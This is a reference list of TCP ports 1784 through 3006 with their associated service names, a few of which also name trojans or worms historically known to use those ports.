TCP 1784 Finle License Manager
TCP 1785 Wind River Systems License Manager
TCP 1786 funk-logger
TCP 1787 funk-license
TCP 1788 psmond
TCP 1789 hello
TCP 1790 Narrative Media Streaming Protocol
TCP 1791 EA1
TCP 1792 ibm-dt-2
TCP 1793 rsc-robot
TCP 1794 cera-bcm
TCP 1795 dpi-proxy
TCP 1796 Vocaltec Server Administration
TCP 1797 UMA
TCP 1798 Event Transfer Protocol
TCP 1799 NETRISK
TCP 1800 ANSYS-License manager
TCP 1801 Microsoft Message Queuing
TCP 1802 ConComp1
TCP 1803 HP-HCIP-GWY
TCP 1804 ENL
TCP 1805 ENL-Name
TCP 1806 Musiconline
TCP 1807 Fujitsu Hot Standby Protocol
TCP 1808 Oracle-VP2
TCP 1809 Oracle-VP1
TCP 1810 Jerand License Manager
TCP 1811 Scientia-SDB
TCP 1812 RADIUS
TCP 1813 RADIUS Accounting
TCP 1814 TDP Suite
TCP 1815 MMPFT
TCP 1816 HARP
TCP 1817 RKB-OSCS
TCP 1818 Enhanced Trivial File Transfer Protocol
TCP 1819 Plato License Manager
TCP 1820 mcagent
TCP 1821 donnyworld
TCP 1822 es-elmd
TCP 1823 Unisys Natural Language License Manager
TCP 1824 metrics-pas
TCP 1825 DirecPC Video
TCP 1826 ARDT
TCP 1827 ASI
TCP 1828 itm-mcell-u
TCP 1829 Optika eMedia
TCP 1830 Oracle Net8 CMan Admin
TCP 1831 Myrtle
TCP 1832 ThoughtTreasure
TCP 1833 udpradio
TCP 1834 ARDUS Unicast
TCP 1835 ARDUS Multicast
TCP 1836 ste-smsc
TCP 1837 csoft1
TCP 1838 TALNET
TCP 1839 netopia-vo1
TCP 1840 netopia-vo2
TCP 1841 netopia-vo3
TCP 1842 netopia-vo4
TCP 1843 netopia-vo5
TCP 1844 DirecPC-DLL
TCP 1850 GSI
TCP 1851 ctcd
TCP 1860 SunSCALAR Services
TCP 1861 LeCroy VICP
TCP 1862 techra-server
TCP 1863 MSN Messenger
TCP 1864 Paradym 31 Port
TCP 1865 ENTP
TCP 1870 SunSCALAR DNS Service
TCP 1871 Cano Central 0
TCP 1872 Cano Central 1
TCP 1873 Fjmpjps
TCP 1874 Fjswapsnp
TCP 1881 IBM MQSeries
TCP 1895 Vista 4GL
TCP 1899 MC2Studios
TCP 1900 SSDP
TCP 1901 Fujitsu ICL Terminal Emulator Program A
TCP 1902 Fujitsu ICL Terminal Emulator Program B
TCP 1903 Local Link Name Resolution
TCP 1904 Fujitsu ICL Terminal Emulator Program C
TCP 1905 Secure UP.Link Gateway Protocol
TCP 1906 TPortMapperReq
TCP 1907 IntraSTAR
TCP 1908 Dawn
TCP 1909 Global World Link
TCP 1910 ultrabac
TCP 1911 Starlight Networks Multimedia Transport Protocol
TCP 1912 rhp-iibp
TCP 1913 armadp
TCP 1914 Elm-Momentum
TCP 1915 FACELINK
TCP 1916 Persoft Persona
TCP 1917 nOAgent
TCP 1918 Candle Directory Service - NDS
TCP 1919 Candle Directory Service - DCH
TCP 1920 Candle Directory Service - FERRET
TCP 1921 NoAdmin
TCP 1922 Tapestry
TCP 1923 SPICE
TCP 1924 XIIP
TCP 1930 Drive AppServer
TCP 1931 AMD SCHED
TCP 1944 close-combat
TCP 1945 dialogic-elmd
TCP 1946 tekpls
TCP 1947 hlserver
TCP 1948 eye2eye
TCP 1949 ISMA Easdaq Live
TCP 1950 ISMA Easdaq Test
TCP 1951 bcs-lmserver
TCP 1952 mpnjsc
TCP 1953 Rapid Base
TCP 1961 BTS APPSERVER
TCP 1962 BIAP-MP
TCP 1963 WebMachine
TCP 1964 SOLID E ENGINE
TCP 1965 Tivoli NPM
TCP 1966 Slush
TCP 1967 SNS Quote
TCP 1972 Cache
TCP 1973 Data Link Switching Remote Access Protocol
TCP 1974 DRP
TCP 1975 TCO Flash Agent
TCP 1976 TCO Reg Agent
TCP 1977 TCO Address Book
TCP 1978 UniSQL
TCP 1979 UniSQL Java
TCP 1984 BB
TCP 1985 Hot Standby Router Protocol
TCP 1986 cisco license management
TCP 1987 cisco RSRB Priority 1 port
TCP 1988 cisco RSRB Priority 2 port
TCP 1989 MHSnet system
TCP 1990 cisco STUN Priority 1 port
TCP 1991 cisco STUN Priority 2 port
TCP 1992 IPsendmsg
TCP 1993 cisco SNMP TCP port
TCP 1994 cisco serial tunnel port
TCP 1995 cisco perf port
TCP 1996 cisco Remote SRB port
TCP 1997 cisco Gateway Discovery Protocol
TCP 1998 cisco X.25 service (XOT)
TCP 1999 cisco identification port / SubSeven (Windows Trojan) / Backdoor (Windows Trojan)
TCP 2000 Remotely Anywhere / VIA NET.WORKS PostOffice Plus
TCP 2001 Cisco mgmt / Remotely Anywhere
TCP 2002 globe
TCP 2003 GNU finger
TCP 2004 mailbox
TCP 2005 encrypted symmetric telnet/login
TCP 2006 invokator
TCP 2007 dectalk
TCP 2008 conf
TCP 2009 news
TCP 2010 search
TCP 2011 raid
TCP 2012 ttyinfo
TCP 2013 raid-am
TCP 2014 troff
TCP 2015 cypress
TCP 2016 bootserver
TCP 2017 cypress-stat
TCP 2018 terminaldb
TCP 2019 whosockami
TCP 2020 xinupageserver
TCP 2021 servexec
TCP 2022 down
TCP 2023 xinuexpansion3
TCP 2024 xinuexpansion4
TCP 2025 ellpack
TCP 2026 scrabble
TCP 2027 shadowserver
TCP 2028 submitserver
TCP 2030 device2
TCP 2032 blackboard
TCP 2033 glogger
TCP 2034 scoremgr
TCP 2035 imsldoc
TCP 2038 objectmanager
TCP 2040 lam
TCP 2041 interbase
TCP 2042 isis
TCP 2043 isis-bcast
TCP 2044 rimsl
TCP 2045 cdfunc
TCP 2046 sdfunc
TCP 2047 dls
TCP 2048 dls-monitor
TCP 2049 Network File System - Sun Microsystems
TCP 2053 Kerberos de-multiplexer
TCP 2054 distrib-net
TCP 2065 Data Link Switch Read Port Number
TCP 2067 Data Link Switch Write Port Number
TCP 2080 Wingate
TCP 2090 Load Report Protocol
TCP 2091 PRP
TCP 2092 Descent 3
TCP 2093 NBX CC
TCP 2094 NBX AU
TCP 2095 NBX SER
TCP 2096 NBX DIR
TCP 2097 Jet Form Preview
TCP 2098 Dialog Port
TCP 2099 H.225.0 Annex G
TCP 2100 amiganetfs
TCP 2101 Microsoft Message Queuing / rtcm-sc104
TCP 2102 Zephyr server
TCP 2103 Microsoft Message Queuing / Zephyr serv-hm connection
TCP 2104 Zephyr hostmanager
TCP 2105 Microsoft Message Queuing / MiniPay
TCP 2106 MZAP
TCP 2107 BinTec Admin
TCP 2108 Comcam
TCP 2109 Ergolight
TCP 2110 UMSP
TCP 2111 DSATP
TCP 2112 Idonix MetaNet
TCP 2113 HSL StoRM
TCP 2114 NEWHEIGHTS
TCP 2115 KDM / Bugs (Windows Trojan)
TCP 2116 CCOWCMR
TCP 2117 MENTACLIENT
TCP 2118 MENTASERVER
TCP 2119 GSIGATEKEEPER
TCP 2120 Quick Eagle Networks CP
TCP 2121 CCProxy FTP / SCIENTIA-SSDB
TCP 2122 CauPC Remote Control
TCP 2123 GTP-Control Plane (3GPP)
TCP 2124 ELATELINK
TCP 2125 LOCKSTEP
TCP 2126 PktCable-COPS
TCP 2127 INDEX-PC-WB
TCP 2128 Net Steward Control
TCP 2129 cs-live.com
TCP 2130 SWC-XDS
TCP 2131 Avantageb2b
TCP 2132 AVAIL-EPMAP
TCP 2133 ZYMED-ZPP
TCP 2134 AVENUE
TCP 2135 Grid Resource Information Server
TCP 2136 APPWORXSRV
TCP 2137 CONNECT
TCP 2138 UNBIND-CLUSTER
TCP 2139 IAS-AUTH
TCP 2140 IAS-REG
TCP 2141 IAS-ADMIND
TCP 2142 TDM-OVER-IP
TCP 2143 Live Vault Job Control
TCP 2144 Live Vault Fast Object Transfer
TCP 2145 Live Vault Remote Diagnostic Console Support
TCP 2146 Live Vault Admin Event Notification
TCP 2147 Live Vault Authentication
TCP 2148 VERITAS UNIVERSAL COMMUNICATION LAYER
TCP 2149 ACPTSYS
TCP 2150 DYNAMIC3D
TCP 2151 DOCENT
TCP 2152 GTP-User Plane (3GPP)
TCP 2165 X-Bone API
TCP 2166 IWSERVER
TCP 2180 Millicent Vendor Gateway Server
TCP 2181 eforward
TCP 2200 ICI
TCP 2201 Advanced Training System Program
TCP 2202 Int. Multimedia Teleconferencing Cosortium
TCP 2213 Kali
TCP 2220 Ganymede
TCP 2221 Rockwell CSP1
TCP 2222 Rockwell CSP2
TCP 2223 Rockwell CSP3
TCP 2232 IVS Video default
TCP 2233 INFOCRYPT
TCP 2234 DirectPlay
TCP 2235 Sercomm-WLink
TCP 2236 Nani
TCP 2237 Optech Port1 License Manager
TCP 2238 AVIVA SNA SERVER
TCP 2239 Image Query
TCP 2240 RECIPe
TCP 2241 IVS Daemon
TCP 2242 Folio Remote Server
TCP 2243 Magicom Protocol
TCP 2244 NMS Server
TCP 2245 HaO
TCP 2279 xmquery
TCP 2280 LNVPOLLER
TCP 2281 LNVCONSOLE
TCP 2282 LNVALARM
TCP 2283 LNVSTATUS
TCP 2284 LNVMAPS
TCP 2285 LNVMAILMON
TCP 2286 NAS-Metering
TCP 2287 DNA
TCP 2288 NETML
TCP 2294 Konshus License Manager (FLEX)
TCP 2295 Advant License Manager
TCP 2296 Theta License Manager (Rainbow)
TCP 2297 D2K DataMover 1
TCP 2298 D2K DataMover 2
TCP 2299 PC Telecommute
TCP 2300 CVMMON
TCP 2301 Compaq HTTP
TCP 2302 Bindery Support
TCP 2303 Proxy Gateway
TCP 2304 Attachmate UTS
TCP 2305 MT ScaleServer
TCP 2306 TAPPI BoxNet
TCP 2307 pehelp
TCP 2308 sdhelp
TCP 2309 SD Server
TCP 2310 SD Client
TCP 2311 Message Service
TCP 2313 IAPP (Inter Access Point Protocol)
TCP 2314 CR WebSystems
TCP 2315 Precise Sft.
TCP 2316 SENT License Manager
TCP 2317 Attachmate G32
TCP 2318 Cadence Control
TCP 2319 InfoLibria
TCP 2320 Siebel NS
TCP 2321 RDLAP over UDP
TCP 2322 ofsd
TCP 2323 3d-nfsd
TCP 2324 Cosmocall
TCP 2325 Design Space License Management
TCP 2326 IDCP
TCP 2327 xingcsm
TCP 2328 Netrix SFTM
TCP 2329 NVD
TCP 2330 TSCCHAT
TCP 2331 AGENTVIEW
TCP 2332 RCC Host
TCP 2333 SNAPP
TCP 2334 ACE Client Auth
TCP 2335 ACE Proxy
TCP 2336 Apple UG Control
TCP 2337 ideesrv
TCP 2338 Norton Lambert
TCP 2339 3Com WebView
TCP 2340 WRS Registry
TCP 2341 XIO Status
TCP 2342 Seagate Manage Exec
TCP 2343 nati logos
TCP 2344 fcmsys
TCP 2345 dbm
TCP 2346 Game Connection Port
TCP 2347 Game Announcement and Location
TCP 2348 Information to query for game status
TCP 2349 Diagnostics Port
TCP 2350 psbserver
TCP 2351 psrserver
TCP 2352 pslserver
TCP 2353 pspserver
TCP 2354 psprserver
TCP 2355 psdbserver
TCP 2356 GXT License Managemant
TCP 2357 UniHub Server
TCP 2358 Futrix
TCP 2359 FlukeServer
TCP 2360 NexstorIndLtd
TCP 2361 TL1
TCP 2362 digiman
TCP 2363 Media Central NFSD
TCP 2364 OI-2000
TCP 2365 dbref
TCP 2366 qip-login
TCP 2367 Service Control
TCP 2368 OpenTable
TCP 2369 ACS2000 DSP
TCP 2370 L3-HBMon
TCP 2381 Compaq HTTPS
TCP 2382 Microsoft OLAP
TCP 2383 Microsoft OLAP
TCP 2384 SD-REQUEST
TCP 2389 OpenView Session Mgr
TCP 2390 RSMTP
TCP 2391 3COM Net Management
TCP 2392 Tactical Auth
TCP 2393 MS OLAP 1
TCP 2394 MS OLAP 2
TCP 2395 LAN900 Remote
TCP 2396 Wusage
TCP 2397 NCL
TCP 2398 Orbiter
TCP 2399 FileMaker Inc. - Data Access Layer
TCP 2400 OpEquus Server
TCP 2401 cvspserver
TCP 2402 TaskMaster 2000 Server
TCP 2403 TaskMaster 2000 Web
TCP 2404 IEC870-5-104
TCP 2405 TRC Netpoll
TCP 2406 JediServer
TCP 2407 Orion
TCP 2408 OptimaNet
TCP 2409 SNS Protocol
TCP 2410 VRTS Registry
TCP 2411 Netwave AP Management
TCP 2412 CDN
TCP 2413 orion-rmi-reg
TCP 2414 Interlingua
TCP 2415 COMTEST
TCP 2416 RMT Server
TCP 2417 Composit Server
TCP 2418 cas
TCP 2419 Attachmate S2S
TCP 2420 DSL Remote Management
TCP 2421 G-Talk
TCP 2422 CRMSBITS
TCP 2423 RNRP
TCP 2424 KOFAX-SVR
TCP 2425 Fujitsu App Manager
TCP 2426 Appliant TCP
TCP 2427 Media Gateway Control Protocol Gateway
TCP 2428 One Way Trip Time
TCP 2429 FT-ROLE
TCP 2430 venus
TCP 2431 venus-se
TCP 2432 codasrv
TCP 2433 codasrv-se
TCP 2434 pxc-epmap
TCP 2435 OptiLogic
TCP 2436 TOP/X
TCP 2437 UniControl
TCP 2438 MSP
TCP 2439 SybaseDBSynch
TCP 2440 Spearway Lockers
TCP 2441 pvsw-inet
TCP 2442 Netangel
TCP 2443 PowerClient Central Storage Facility
TCP 2444 BT PP2 Sectrans
TCP 2445 DTN1
TCP 2446 bues_service
TCP 2447 OpenView NNM daemon
TCP 2448 hpppsvr
TCP 2449 RATL
TCP 2450 netadmin
TCP 2451 netchat
TCP 2452 SnifferClient
TCP 2453 madge-om
TCP 2454 IndX-DDS
TCP 2455 WAGO-IO-SYSTEM
TCP 2456 altav-remmgt
TCP 2457 Rapido_IP
TCP 2458 griffin
TCP 2459 Community
TCP 2460 ms-theater
TCP 2461 qadmifoper
TCP 2462 qadmifevent
TCP 2463 Symbios Raid
TCP 2464 DirecPC SI
TCP 2465 Load Balance Management
TCP 2466 Load Balance Forwarding
TCP 2467 High Criteria
TCP 2468 qip_msgd
TCP 2469 MTI-TCS-COMM
TCP 2470 taskman port
TCP 2471 SeaODBC
TCP 2472 C3
TCP 2473 Aker-cdp
TCP 2474 Vital Analysis
TCP 2475 ACE Server
TCP 2476 ACE Server Propagation
TCP 2477 SecurSight Certificate Valifation Service
TCP 2478 SecurSight Authentication Server (SLL)
TCP 2479 SecurSight Event Logging Server (SSL)
TCP 2480 Lingwood's Detail
TCP 2481 Oracle GIOP
TCP 2482 Oracle GIOP SSL
TCP 2483 Oracle TTC
TCP 2484 Oracle TTC SSL
TCP 2485 Net Objects1
TCP 2486 Net Objects2
TCP 2487 Policy Notice Service
TCP 2488 Moy Corporation
TCP 2489 TSILB
TCP 2490 qip_qdhcp
TCP 2491 Conclave CPP
TCP 2492 GROOVE
TCP 2493 Talarian MQS
TCP 2494 BMC AR
TCP 2495 Fast Remote Services
TCP 2496 DIRGIS
TCP 2497 Quad DB
TCP 2498 ODN-CasTraq
TCP 2499 UniControl
TCP 2500 Resource Tracking system server
TCP 2501 Resource Tracking system client
TCP 2502 Kentrox Protocol
TCP 2503 NMS-DPNSS
TCP 2504 WLBS
TCP 2505 torque-traffic
TCP 2506 jbroker
TCP 2507 spock
TCP 2508 JDataStore
TCP 2509 fjmpss
TCP 2510 fjappmgrbulk
TCP 2511 Metastorm
TCP 2512 Citrix IMA
TCP 2513 Citrix ADMIN
TCP 2514 Facsys NTP
TCP 2515 Facsys Router
TCP 2516 Main Control
TCP 2517 H.323 Annex E call signaling transport
TCP 2518 Willy
TCP 2519 globmsgsvc
TCP 2520 pvsw
TCP 2521 Adaptec Manager
TCP 2522 WinDb
TCP 2523 Qke LLC V.3
TCP 2524 Optiwave License Management
TCP 2525 MS V-Worlds
TCP 2526 EMA License Manager
TCP 2527 IQ Server
TCP 2528 NCR CCL
TCP 2529 UTS FTP
TCP 2530 VR Commerce
TCP 2531 ITO-E GUI
TCP 2532 OVTOPMD
TCP 2533 SnifferServer
TCP 2534 Combox Web Access
TCP 2535 MADCAP
TCP 2536 btpp2audctr1
TCP 2537 Upgrade Protocol
TCP 2538 vnwk-prapi
TCP 2539 VSI Admin
TCP 2540 LonWorks
TCP 2541 LonWorks2
TCP 2542 daVinci
TCP 2543 REFTEK
TCP 2544 Novell ZEN
TCP 2545 sis-emt
TCP 2546 vytalvaultbrtp
TCP 2547 vytalvaultvsmp
TCP 2548 vytalvaultpipe
TCP 2549 IPASS
TCP 2550 ADS
TCP 2551 ISG UDA Server
TCP 2552 Call Logging
TCP 2553 efidiningport
TCP 2554 VCnet-Link v10
TCP 2555 Compaq WCP
TCP 2556 nicetec-nmsvc
TCP 2557 nicetec-mgmt
TCP 2558 PCLE Multi Media
TCP 2559 LSTP
TCP 2560 labrat
TCP 2561 MosaixCC
TCP 2562 Delibo
TCP 2563 CTI Redwood
TCP 2564 HP 3000 NS/VT block mode telnet
TCP 2565 Coordinator Server
TCP 2566 pcs-pcw
TCP 2567 Cisco Line Protocol
TCP 2568 SPAM TRAP
TCP 2569 Sonus Call Signal
TCP 2570 HS Port
TCP 2571 CECSVC
TCP 2572 IBP
TCP 2573 Trust Establish
TCP 2574 Blockade BPSP
TCP 2575 HL7
TCP 2576 TCL Pro Debugger
TCP 2577 Scriptics Lsrvr
TCP 2578 RVS ISDN DCP
TCP 2579 mpfoncl
TCP 2580 Tributary
TCP 2581 ARGIS TE
TCP 2582 ARGIS DS
TCP 2583 MON
TCP 2584 cyaserv
TCP 2585 NETX Server
TCP 2586 NETX Agent
TCP 2587 MASC
TCP 2588 Privilege
TCP 2589 quartus tcl
TCP 2590 idotdist
TCP 2591 Maytag Shuffle
TCP 2592 netrek
TCP 2593 MNS Mail Notice Service
TCP 2594 Data Base Server
TCP 2595 World Fusion 1
TCP 2596 World Fusion 2
TCP 2597 Homestead Glory
TCP 2598 Citrix MA Client
TCP 2599 Meridian Data
TCP 2600 HPSTGMGR
TCP 2601 discp client
TCP 2602 discp server
TCP 2603 Service Meter
TCP 2604 NSC CCS
TCP 2605 NSC POSA
TCP 2606 Dell Netmon
TCP 2607 Dell Connection
TCP 2608 Wag Service
TCP 2609 System Monitor
TCP 2610 VersaTek
TCP 2611 LIONHEAD
TCP 2612 Qpasa Agent
TCP 2613 SMNTUBootstrap
TCP 2614 Never Offline
TCP 2615 firepower
TCP 2616 appswitch-emp
TCP 2617 Clinical Context Managers
TCP 2618 Priority E-Com
TCP 2619 bruce
TCP 2620 LPSRecommender
TCP 2621 Miles Apart Jukebox Server
TCP 2622 MetricaDBC
TCP 2623 LMDP
TCP 2624 Aria
TCP 2625 Blwnkl Port
TCP 2626 gbjd816
TCP 2627 Moshe Beeri
TCP 2628 DICT
TCP 2629 Sitara Server
TCP 2630 Sitara Management
TCP 2631 Sitara Dir
TCP 2632 IRdg Post
TCP 2633 InterIntelli
TCP 2634 PK Electronics
TCP 2635 Back Burner
TCP 2636 Solve
TCP 2637 Import Document Service
TCP 2638 Sybase Anywhere
TCP 2639 AMInet
TCP 2640 Sabbagh Associates Licence Manager
TCP 2641 HDL Server
TCP 2642 Tragic
TCP 2643 GTE-SAMP
TCP 2644 Travsoft IPX Tunnel
TCP 2645 Novell IPX CMD
TCP 2646 AND Licence Manager
TCP 2647 SyncServer
TCP 2648 Upsnotifyprot
TCP 2649 VPSIPPORT
TCP 2650 eristwoguns
TCP 2651 EBInSite
TCP 2652 InterPathPanel
TCP 2653 Sonus
TCP 2654 Corel VNC Admin
TCP 2655 UNIX Nt Glue
TCP 2656 Kana
TCP 2657 SNS Dispatcher
TCP 2658 SNS Admin
TCP 2659 SNS Query
TCP 2660 GC Monitor
TCP 2661 OLHOST
TCP 2662 BinTec-CAPI
TCP 2663 BinTec-TAPI
TCP 2664 Command MQ GM
TCP 2665 Command MQ PM
TCP 2666 extensis
TCP 2667 Alarm Clock Server
TCP 2668 Alarm Clock Client
TCP 2669 TOAD
TCP 2670 TVE Announce
TCP 2671 newlixreg
TCP 2672 nhserver
TCP 2673 First Call 42
TCP 2674 ewnn
TCP 2675 TTC ETAP
TCP 2676 SIMSLink
TCP 2677 Gadget Gate 1 Way
TCP 2678 Gadget Gate 2 Way
TCP 2679 Sync Server SSL
TCP 2680 pxc-sapxom
TCP 2681 mpnjsomb
TCP 2682 SRSP
TCP 2683 NCDLoadBalance
TCP 2684 mpnjsosv
TCP 2685 mpnjsocl
TCP 2686 mpnjsomg
TCP 2687 pq-lic-mgmt
TCP 2688 md-cf-HTTP
TCP 2689 FastLynx
TCP 2690 HP NNM Embedded Database
TCP 2691 IT Internet
TCP 2692 Admins LMS
TCP 2693 belarc-HTTP
TCP 2694 pwrsevent
TCP 2695 VSPREAD
TCP 2696 Unify Admin
TCP 2697 Oce SNMP Trap Port
TCP 2698 MCK-IVPIP
TCP 2699 Csoft Plus Client
TCP 2700 tqdata
TCP 2701 SMS RCINFO
TCP 2702 SMS XFER
TCP 2703 SMS CHAT
TCP 2704 SMS REMCTRL
TCP 2705 SDS Admin
TCP 2706 NCD Mirroring
TCP 2707 EMCSYMAPIPORT
TCP 2708 Banyan-Net
TCP 2709 Supermon
TCP 2710 SSO Service
TCP 2711 SSO Control
TCP 2712 Axapta Object Communication Protocol
TCP 2713 Raven1
TCP 2714 Raven2
TCP 2715 HPSTGMGR2
TCP 2716 Inova IP Disco
TCP 2717 PN REQUESTER
TCP 2718 PN REQUESTER 2
TCP 2719 Scan &Change
TCP 2720 wkars
TCP 2721 Smart Diagnose
TCP 2722 Proactive Server
TCP 2723 WatchDog NT
TCP 2724 qotps
TCP 2725 MSOLAP PTP2
TCP 2726 TAMS
TCP 2727 Media Gateway Control Protocol Call Agent
TCP 2728 SQDR
TCP 2729 TCIM Control
TCP 2730 NEC RaidPlus
TCP 2731 NetDragon Messanger
TCP 2732 G5M
TCP 2733 Signet CTF
TCP 2734 CCS Software
TCP 2735 Monitor Console
TCP 2736 RADWIZ NMS SRV
TCP 2737 SRP Feedback
TCP 2738 NDL TCP-OSI Gateway
TCP 2739 TN Timing
TCP 2740 Alarm
TCP 2741 TSB
TCP 2742 TSB2
TCP 2743 murx
TCP 2744 honyaku
TCP 2745 Win32/Bagle worm / URBISNET
TCP 2746 CPUDPENCAP
TCP 2747 yk.fujitsu.co.jp
TCP 2748 yk.fujitsu.co.jp
TCP 2749 yk.fujitsu.co.jp
TCP 2750 yk.fujitsu.co.jp
TCP 2751 yk.fujitsu.co.jp
TCP 2752 RSISYS ACCESS
TCP 2753 de-spot
TCP 2754 APOLLO CC
TCP 2755 Express Pay
TCP 2756 simplement-tie
TCP 2757 CNRP
TCP 2758 APOLLO Status
TCP 2759 APOLLO GMS
TCP 2760 Saba MS
TCP 2761 DICOM ISCL
TCP 2762 DICOM TLS
TCP 2763 Desktop DNA
TCP 2764 Data Insurance
TCP 2765 qip-audup
TCP 2766 Compaq SCP
TCP 2767 UADTC
TCP 2768 UACS
TCP 2769 Single Point MVS
TCP 2770 Veronica
TCP 2771 Vergence CM
TCP 2772 auris
TCP 2773 PC Backup
TCP 2774 PC Backup
TCP 2775 SMMP
TCP 2776 Ridgeway Systems &Software
TCP 2777 Ridgeway Systems &Software
TCP 2778 Gwen-Sonya
TCP 2779 LBC Sync
TCP 2780 LBC Control
TCP 2781 whosells
TCP 2782 everydayrc
TCP 2783 AISES
TCP 2784 world wide web - development
TCP 2785 aic-np
TCP 2786 aic-oncrpc - Destiny MCD database
TCP 2787 piccolo - Cornerstone Software
TCP 2788 NetWare Loadable Module - Seagate Software
TCP 2789 Media Agent
TCP 2790 PLG Proxy
TCP 2791 MT Port Registrator
TCP 2792 f5-globalsite
TCP 2793 initlsmsad
TCP 2794 aaftp
TCP 2795 LiveStats
TCP 2796 ac-tech
TCP 2797 esp-encap
TCP 2798 TMESIS-UPShot
TCP 2799 ICON Discover
TCP 2800 ACC RAID
TCP 2801 IGCP
TCP 2802 Veritas TCP1
TCP 2803 btprjctrl
TCP 2804 Telexis VTU
TCP 2805 WTA WSP-S
TCP 2806 cspuni
TCP 2807 cspmulti
TCP 2808 J-LAN-P
TCP 2809 CORBA LOC
TCP 2810 Active Net Steward
TCP 2811 GSI FTP
TCP 2812 atmtcp
TCP 2813 llm-pass
TCP 2814 llm-csv
TCP 2815 LBC Measurement
TCP 2816 LBC Watchdog
TCP 2817 NMSig Port
TCP 2818 rmlnk
TCP 2819 FC Fault Notification
TCP 2820 UniVision
TCP 2821 vml_dms
TCP 2822 ka0wuc
TCP 2823 CQG Net/LAN
TCP 2826 slc systemlog
TCP 2827 slc ctrlrloops
TCP 2828 ITM License Manager
TCP 2829 silkp1
TCP 2830 silkp2
TCP 2831 silkp3
TCP 2832 silkp4
TCP 2833 glishd
TCP 2834 EVTP
TCP 2835 EVTP-DATA
TCP 2836 catalyst
TCP 2837 Repliweb
TCP 2838 Starbot
TCP 2839 NMSigPort
TCP 2840 l3-exprt
TCP 2841 l3-ranger
TCP 2842 l3-hawk
TCP 2843 PDnet
TCP 2844 BPCP POLL
TCP 2845 BPCP TRAP
TCP 2846 AIMPP Hello
TCP 2847 AIMPP Port Req
TCP 2848 AMT-BLC-PORT
TCP 2849 FXP
TCP 2850 MetaConsole
TCP 2851 webemshttp
TCP 2852 bears-01
TCP 2853 ISPipes
TCP 2854 InfoMover
TCP 2856 cesdinv
TCP 2857 SimCtIP
TCP 2858 ECNP
TCP 2859 Active Memory
TCP 2860 Dialpad Voice 1
TCP 2861 Dialpad Voice 2
TCP 2862 TTG Protocol
TCP 2863 Sonar Data
TCP 2864 main 5001 cmd
TCP 2865 pit-vpn
TCP 2866 lwlistener
TCP 2867 esps-portal
TCP 2868 NPEP Messaging
TCP 2869 ICSLAP
TCP 2870 daishi
TCP 2871 MSI Select Play
TCP 2872 CONTRACT
TCP 2873 PASPAR2 ZoomIn
TCP 2874 dxmessagebase1
TCP 2875 dxmessagebase2
TCP 2876 SPS Tunnel
TCP 2877 BLUELANCE
TCP 2878 AAP
TCP 2879 ucentric-ds
TCP 2880 synapse
TCP 2881 NDSP
TCP 2882 NDTP
TCP 2883 NDNP
TCP 2884 Flash Msg
TCP 2885 TopFlow
TCP 2886 RESPONSELOGIC
TCP 2887 aironet
TCP 2888 SPCSDLOBBY
TCP 2889 RSOM
TCP 2890 CSPCLMULTI
TCP 2891 CINEGRFX-ELMD License Manager
TCP 2892 SNIFFERDATA
TCP 2893 VSECONNECTOR
TCP 2894 ABACUS-REMOTE
TCP 2895 NATUS LINK
TCP 2896 ECOVISIONG6-1
TCP 2897 Citrix RTMP
TCP 2898 APPLIANCE-CFG
TCP 2899 case.nm.fujitsu.co.jp
TCP 2900 magisoft.com
TCP 2901 ALLSTORCNS
TCP 2902 NET ASPI
TCP 2903 SUITCASE
TCP 2904 M2UA
TCP 2905 M3UA
TCP 2906 CALLER9
TCP 2907 WEBMETHODS B2B
TCP 2908 mao
TCP 2909 Funk Dialout
TCP 2910 TDAccess
TCP 2911 Blockade
TCP 2912 Epicon
TCP 2913 Booster Ware
TCP 2914 Game Lobby
TCP 2915 TK Socket
TCP 2916 Elvin Server
TCP 2917 Elvin Client
TCP 2918 Kasten Chase Pad
TCP 2919 ROBOER
TCP 2920 ROBOEDA
TCP 2921 CESD Contents Delivery Management
TCP 2922 CESD Contents Delivery Data Transfer
TCP 2923 WTA-WSP-WTP-S
TCP 2924 PRECISE-VIP
TCP 2925 Firewall Redundancy Protocol
TCP 2926 MOBILE-FILE-DL
TCP 2927 UNIMOBILECTRL
TCP 2928 REDSTONE-CPSS
TCP 2929 PANJA-WEBADMIN
TCP 2930 PANJA-WEBLINX
TCP 2931 Circle-X
TCP 2932 INCP
TCP 2933 4-TIER OPM GW
TCP 2934 4-TIER OPM CLI
TCP 2935 QTP
TCP 2936 OTPatch
TCP 2937 PNACONSULT-LM
TCP 2938 SM-PAS-1
TCP 2939 SM-PAS-2
TCP 2940 SM-PAS-3
TCP 2941 SM-PAS-4
TCP 2942 SM-PAS-5
TCP 2943 TTNRepository
TCP 2944 Megaco H-248
TCP 2945 H248 Binary
TCP 2946 FJSVmpor
TCP 2947 GPSD
TCP 2948 WAP PUSH
TCP 2949 WAP PUSH SECURE
TCP 2950 ESIP
TCP 2951 OTTP
TCP 2952 MPFWSAS
TCP 2953 OVALARMSRV
TCP 2954 OVALARMSRV-CMD
TCP 2955 CSNOTIFY
TCP 2956 OVRIMOSDBMAN
TCP 2957 JAMCT5
TCP 2958 JAMCT6
TCP 2959 RMOPAGT
TCP 2960 DFOXSERVER
TCP 2961 BOLDSOFT-LM
TCP 2962 IPH-POLICY-CLI
TCP 2963 IPH-POLICY-ADM
TCP 2964 BULLANT SRAP
TCP 2965 BULLANT RAP
TCP 2966 IDP-INFOTRIEVE
TCP 2967 SSC-AGENT
TCP 2968 ENPP
TCP 2969 UPnP / ESSP
TCP 2970 INDEX-NET
TCP 2971 Net Clip
TCP 2972 PMSM Webrctl
TCP 2973 SV Networks
TCP 2974 Signal
TCP 2975 Fujitsu Configuration Management Service
TCP 2976 CNS Server Port
TCP 2977 TTCs Enterprise Test Access Protocol - NS
TCP 2978 TTCs Enterprise Test Access Protocol - DS
TCP 2979 H.263 Video Streaming
TCP 2980 Instant Messaging Service
TCP 2981 MYLXAMPORT
TCP 2982 IWB-WHITEBOARD
TCP 2983 NETPLAN
TCP 2984 HPIDSADMIN
TCP 2985 HPIDSAGENT
TCP 2986 STONEFALLS
TCP 2987 IDENTIFY
TCP 2988 CLASSIFY
TCP 2989 ZARKOV
TCP 2990 BOSCAP
TCP 2991 WKSTN-MON
TCP 2992 ITB301
TCP 2993 VERITAS VIS1
TCP 2994 VERITAS VIS2
TCP 2995 IDRS
TCP 2996 vsixml
TCP 2997 REBOL
TCP 2998 Real Secure
TCP 2999 RemoteWare Unassigned
TCP 3000 RemoteWare Client
TCP 3001 Phatbot Worm / Redwood Broker
TCP 3002 RemoteWare Server
TCP 3003 CGMS
TCP 3004 Csoft Agent
TCP 3005 Genius License Manager
TCP 3006 Instant Internet Admin
